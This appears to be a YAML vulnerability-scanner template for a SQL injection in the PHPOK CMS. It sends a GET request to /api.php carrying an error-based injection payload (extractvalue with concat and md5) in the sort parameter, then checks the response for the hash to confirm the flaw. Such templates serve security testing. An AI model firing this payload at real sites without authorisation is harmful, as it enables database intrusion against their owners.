漏洞描述
phpok sqli vulnerability
id: phpok-sqli
info:
name: phpok sqli
author: jinqi
severity: high
description: |-
phpok sqli vulnerability
tags: phpok,sqli
created: 2023/10/13
set:
r1: randomInt(800000000, 1000000000)
rules:
r0:
request:
method: GET
path: /api.php?c=project&f=index&token=1234&id=news&sort=1 and extractvalue(1,concat(0x7e,md5({{r1}}))) --+
expression: response.body.bcontains(bytes(substr(md5(string(r1)), 0, 31)))
expression: r0()